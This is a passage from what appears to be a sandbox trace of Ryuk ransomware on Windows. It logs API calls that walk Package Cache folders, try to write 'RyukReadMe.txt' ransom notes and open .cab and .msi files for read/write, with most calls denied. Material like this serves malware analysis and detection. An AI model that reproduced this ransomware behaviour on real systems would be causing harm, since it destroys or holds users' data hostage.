dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.728] GetLastError () returned 0x5 [0159.728] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.728] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.728] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.728] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.729] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.729] SetLastError (dwErrCode=0x0) [0159.729] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.729] GetLastError () returned 0x5 [0159.729] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.729] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.729] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.729] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.729] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.729] SetLastError (dwErrCode=0x0) [0159.729] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.729] GetLastError () returned 0x5 [0159.730] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.730] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.730] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.730] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.730] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.730] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.730] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.731] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.731] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.731] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0159.731] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.731] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.732] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.732] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.732] SetLastError (dwErrCode=0x0) [0159.732] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.732] GetLastError () returned 0x5 [0159.732] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.732] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.732] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.732] SetLastError (dwErrCode=0x0) [0159.732] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.732] GetLastError () returned 0x5 [0159.732] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.732] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.732] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.733] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.733] SetLastError (dwErrCode=0x0) [0159.733] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.733] GetLastError () returned 0x5 [0159.733] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.733] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.733] SetLastError (dwErrCode=0x0) [0159.733] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.733] GetLastError () returned 0x5 [0159.733] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.733] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.733] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.734] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.734] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.734] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.734] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x80) returned 0 [0159.734] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.734] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.734] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.735] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.735] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.735] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.735] SetLastError (dwErrCode=0x0) [0159.735] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.735] GetLastError () returned 0x5 [0159.735] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.735] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.735] SetLastError (dwErrCode=0x0) [0159.735] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.735] GetLastError () returned 0x5 [0159.735] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.735] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.735] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.736] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.736] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.736] SetLastError (dwErrCode=0x0) [0159.736] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.736] GetLastError () returned 0x5 [0159.736] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.736] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.736] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.736] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.736] SetLastError (dwErrCode=0x0) [0159.736] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.737] GetLastError () returned 0x5 [0159.737] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.737] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.737] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.737] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.737] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.737] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.737] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.738] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.738] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.738] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.738] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.738] SetLastError (dwErrCode=0x0) [0159.738] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.738] GetLastError () returned 0x5 [0159.738] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.738] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.738] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.738] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.739] SetLastError (dwErrCode=0x0) [0159.739] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.739] GetLastError () returned 0x5 [0159.739] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.739] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.739] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.739] SetLastError (dwErrCode=0x0) [0159.739] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.739] GetLastError () returned 0x5 [0159.739] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.739] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.739] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.739] SetLastError (dwErrCode=0x0) [0159.739] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.740] GetLastError () returned 0x5 [0159.740] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.740] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.740] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.740] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.740] SetLastError (dwErrCode=0x0) [0159.740] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.740] GetLastError () returned 0x5 [0159.740] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.740] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.740] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.741] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.741] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.741] SetLastError (dwErrCode=0x0) [0159.741] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.741] GetLastError () returned 0x5 [0159.741] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.741] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.741] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.741] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.742] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.742] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.742] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.742] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.742] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.742] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.742] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0159.743] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.743] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.743] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | 